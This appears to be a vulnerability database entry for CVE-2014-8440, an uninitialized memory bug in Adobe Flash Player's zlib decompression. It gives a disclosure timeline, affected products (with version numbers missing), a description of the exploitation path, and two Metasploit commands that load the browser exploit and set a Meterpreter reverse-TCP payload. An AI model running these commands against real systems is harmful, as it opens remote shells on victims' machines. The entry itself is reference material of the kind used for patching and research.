CVE-2014-8440 Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory

Timeline :

Vulnerability discovered by bilou and reported to Verisign's iDefense VCP
Vulnerability reported to the vendor by Verisign's iDefense VCP on 2014-09-03
Patched by the vendor via APSB14-24 on 2014-11-11
Vulnerability reported as integrated into exploit kits on 2014-11-20
Metasploit PoC provided on 2015-04-30

PoC provided by :

Nicolas Joly (bilou ?)
juan vazquez

Reference(s) :


Affected version(s) :

Adobe Flash Player and earlier versions
Adobe Flash Player and earlier 13.x versions
Adobe Flash Player and earlier versions for Linux
Adobe AIR desktop runtime and earlier versions
Adobe AIR SDK and earlier versions
Adobe AIR SDK & Compiler and earlier versions
Adobe AIR and earlier versions for Android

Tested on :

with Adobe Flash Player and Internet Explorer 11 on Windows 7 SP1

Description :

This module exploits an uninitialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails to initialize allocated memory. Given a suitable memory layout, this vulnerability leads to a ByteArray object corruption, which can be abused to read and corrupt memory. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash

Commands :

use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
set PAYLOAD windows/meterpreter/reverse_tcp